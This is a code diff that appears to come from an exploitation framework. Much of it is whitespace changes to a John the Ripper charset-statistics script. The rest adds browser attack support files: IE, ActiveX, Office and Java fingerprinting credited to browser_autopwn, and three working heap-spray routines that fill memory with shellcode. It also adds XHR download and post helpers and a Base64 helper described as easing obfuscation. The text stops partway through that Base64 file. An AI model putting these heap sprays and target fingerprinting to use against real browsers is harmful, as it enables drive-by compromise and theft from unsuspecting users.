ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

96
data/john/run.linux.x86.sse2/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

96
data/john/run.win32.any/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

96
data/john/run.win32.mmx/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

96
data/john/run.win32.sse2/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

89
data/js/detect/ie_addons.js Normal file
View File

@ -0,0 +1,89 @@
window.ie_addons_detect = { };
/**
* Returns true if this ActiveX is available, otherwise false.
* Grabbed this directly from browser_autopwn.rb
**/
window.ie_addons_detect.hasActiveX = function (axo_name, method) {
var axobj = null;
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
axobj = document.createElement("object");
axobj.setAttribute("classid", "clsid:" + axo_name);
axobj.setAttribute("id", axo_name);
axobj.setAttribute("style", "visibility: hidden");
axobj.setAttribute("width", "0px");
axobj.setAttribute("height", "0px");
document.body.appendChild(axobj);
if (typeof(axobj[method]) == 'undefined') {
var attributes = 'id="' + axo_name + '"';
attributes += ' classid="clsid:' + axo_name + '"';
attributes += ' style="visibility: hidden"';
attributes += ' width="0px" height="0px"';
document.body.innerHTML += "<object " + attributes + "></object>";
axobj = document.getElementById(axo_name);
}
} else {
try {
axobj = new ActiveXObject(axo_name);
} catch(e) {
// If we can't build it with an object tag and we can't build it
// with ActiveXObject, it can't be built.
return false;
};
}
if (typeof(axobj[method]) != 'undefined') {
return true;
}
return false;
};
/**
* Returns the version of Microsoft Office. If not found, returns null.
**/
window.ie_addons_detect.getMsOfficeVersion = function () {
var version;
var types = new Array();
for (var i=1; i <= 5; i++) {
try {
types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
}
catch (e) {
types[i-1] = null;
}
}
if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == 'object' && types[4] == 'object')
{
version = "2012";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == 'object' && types[4] == null)
{
version = "2010";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == null && types[4] == null)
{
version = "2007";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
types[3] == null && types[4] == null)
{
version = "2003";
}
else if (types[0] == 'object' && types[1] == null && types[2] == null &&
types[3] == null && types[4] == null)
{
// If run for the first time, you must manullay allow the "Microsoft Office XP"
// add-on to run. However, this prompt won't show because the ActiveXObject statement
// is wrapped in an exception handler.
version = "xp";
}
else {
version = null;
}
return version;
}

64
data/js/detect/misc_addons.js Normal file
View File

@ -0,0 +1,64 @@
window.misc_addons_detect = { };
/**
* Returns the Java version
**/
window.misc_addons_detect.getJavaVersion = function () {
var foundVersion = null;
//
// This finds the Java version from Java WebStart's ActiveX control
// This is specific to Windows
//
for (var i1=0; i1 < 10; i1++) {
for (var i2=0; i2 < 10; i2++) {
for (var i3=0; i3 < 10; i3++) {
for (var i4=0; i4 < 10; i4++) {
var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
var progId = "JavaWebStart.isInstalled." + version;
try {
new ActiveXObject(progId);
return version;
}
catch (e) {
continue;
}
}}}}
//
// This finds the Java version from window.navigator.mimeTypes
// This seems to work pretty well for most browsers except for IE
//
if (foundVersion == null) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i<mimes.length; i++) {
var m = /java.+;version=(.+)/.exec(mimes[i].type);
if (m) {
var version = parseFloat(m[1]);
if (version > foundVersion) {
foundVersion = version;
}
}
}
}
//
// This finds the Java version from navigator plugins
// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
// So we do this last.
//
if (foundVersion == null) {
var foundJavaString = "";
var pluginsCount = navigator.plugins.length;
for (i=0; i < pluginsCount; i++) {
var pluginName = navigator.plugins[i].name;
var pluginVersion = navigator.plugins[i].version;
if (/Java/.test(pluginName) && pluginVersion != undefined) {
foundVersion = navigator.plugins[i].version;
break;
}
}
}
return foundVersion;
}

45
lib/rex/exploitation/javascriptosdetect.js → data/js/detect/os.js
View File

@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){
return d.style[propCamelCase] === css;
}
var input_type_is_valid = function(input_type) {
if (!document.createElement) return false;
var input = document.createElement('input');
input.setAttribute('type', input_type);
return input.type == input_type;
}
//--
// Client
//--
@ -203,32 +210,42 @@ window.os_detect.getVersion = function(){
// Thanks to developer.mozilla.org "Firefox for developers" series for most
// of these.
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
if ('HTMLTimeElement' in window) {
ua_version = '22.0'
if (css_is_valid('background-attachment',
'backgroundAttachment',
'local')) {
ua_version = '25.0';
} else if ('DeviceStorage' in window && window.DeviceStorage &&
'default' in window.DeviceStorage.prototype) {
// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
ua_version = '24.0';
} else if (input_type_is_valid('range')) {
ua_version = '23.0';
} else if ('HTMLTimeElement' in window) {
ua_version = '22.0';
} else if ('createElement' in document &&
document.createElement('main') &&
document.createElement('main').constructor === window['HTMLElement']) {
ua_version = '21.0'
ua_version = '21.0';
} else if ('imul' in Math) {
ua_version = '20.0'
ua_version = '20.0';
} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
ua_version = '19.0'
ua_version = '19.0';
} else if ('devicePixelRatio' in window) {
ua_version = '18.0'
ua_version = '18.0';
} else if ('createElement' in document &&
document.createElement('iframe') &&
'sandbox' in document.createElement('iframe')) {
ua_version = '17.0'
ua_version = '17.0';
} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
ua_version = '16.0'
ua_version = '16.0';
} else if ('HTMLSourceElement' in window &&
HTMLSourceElement.prototype &&
'media' in HTMLSourceElement.prototype) {
ua_version = '15.0'
ua_version = '15.0';
} else if ('mozRequestPointerLock' in document.body) {
ua_version = '14.0'
ua_version = '14.0';
} else if ('Map' in window) {
ua_version = "13.0"
ua_version = "13.0";
} else if ('mozConnection' in navigator) {
ua_version = "12.0";
} else if ('mozVibrate' in navigator) {
@ -850,6 +867,12 @@ window.os_detect.getVersion = function(){
os_flavor = "7";
os_sp = "SP1";
break;
case "10016720":
// IE 10.0.9200.16721 / Windows 7 SP1
ua_version = "10.0";
os_flavor = "7";
os_sp = "SP1";
break;
case "1000":
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
ua_version = "10.0";

17
data/js/memory/heap_spray.js Normal file
View File

@ -0,0 +1,17 @@
var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
}

31
data/js/memory/mstime_malloc.js Normal file
View File

@ -0,0 +1,31 @@
function mstime_malloc(oArg) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0; }
if (heapBlockSize == undefined) { throw "Size must be defined"; }
var buf = "";
for (var i=0; i < heapBlockSize/4; i++) {
if (i == offset) {
if (i == 0) { buf += shellcode; }
else { buf += ";" + shellcode; }
}
else {
buf += ";#W00TA";
}
}
var e = document.getElementById(objId);
if (e == null) {
var eleId = "W00TB"
var acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
document.body.innerHTML = document.body.innerHTML + acTag;
e = document.getElementById(eleId);
}
try { e.values = buf; }
catch (e) {}
}

38
data/js/memory/property_spray.js Normal file
View File

@ -0,0 +1,38 @@
var sym_div_container;
function sprayHeap( oArg ) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var maxAllocs = oArg.maxAllocs;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0x00; }
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
if (maxAllocs == undefined) { maxAllocs = 0x350; }
if (offset > 0x800) { throw "Bad alignment"; }
sym_div_container = document.getElementById(objId);
if (sym_div_container == null) {
sym_div_container = document.createElement("div");
}
sym_div_container.style.cssText = "display:none";
var data;
junk = unescape("%u2020%u2020");
while (junk.length < offset+0x1000) junk += junk;
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800-offset-shellcode.length);
while (data.length < heapBlockSize) data += data;
for (var i = 0; i < maxAllocs; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0, (heapBlockSize-2)/2);
sym_div_container.appendChild(obj);
}
}

18
data/js/network/ajax_download.js Normal file
View File

@ -0,0 +1,18 @@
function ajax_download(oArg) {
if (!oArg.method) { oArg.method = "GET"; }
if (!oArg.path) { throw "Missing parameter 'path'"; }
if (!oArg.data) { oArg.data = null; }
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open(oArg.method, oArg.path, false);
xmlHttp.send(oArg.data);
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
return xmlHttp.responseText;
}
return null;
}

10
data/js/network/ajax_post.js Normal file
View File

@ -0,0 +1,10 @@
function postInfo(path, data) {
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open('POST', path, false);
xmlHttp.send(data);
}

15
data/js/network/xhr_shim.js Normal file
View File

@ -0,0 +1,15 @@
if (!window.XMLHTTPRequest) {
(function() {
var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
for (idx = 0; idx < activeObjs.length; idx++) {
try {
new ActiveXObject(activeObjs[idx]);
window.XMLHttpRequest = function() {
return new ActiveXObject(activeObjs[idx]);
};
break;
}
catch (e) {}
}
})();
}

126
data/js/utils/base64.js Normal file
View File

@ -0,0 +1,126 @@
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
// variable names changed to make obfuscation easier
var Base64 = {
// private property
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// private method
_utf8_encode : function ( input ){
input = input.replace(/\r\n/g,"\\n");
var utftext = "";
var input_idx;
for (input_idx = 0; input_idx < input.length; input_idx++) {
var chr = input.charCodeAt(input_idx);
if (chr < 128) {
utftext += String.fromCharCode(chr);
}
else if((chr > 127) && (chr < 2048)) {
utftext += String.fromCharCode((chr >> 6) | 192);
utftext += String.fromCharCode((chr & 63) | 128);
} else {
utftext += String.fromCharCode((chr >> 12) | 224);
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
utftext += String.fromCharCode((chr & 63) | 128);
}
}
return utftext;
},
// public method for encoding
encode : function( input ) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var input_idx = 0;
input = Base64._utf8_encode(input);
while (input_idx < input.length) {
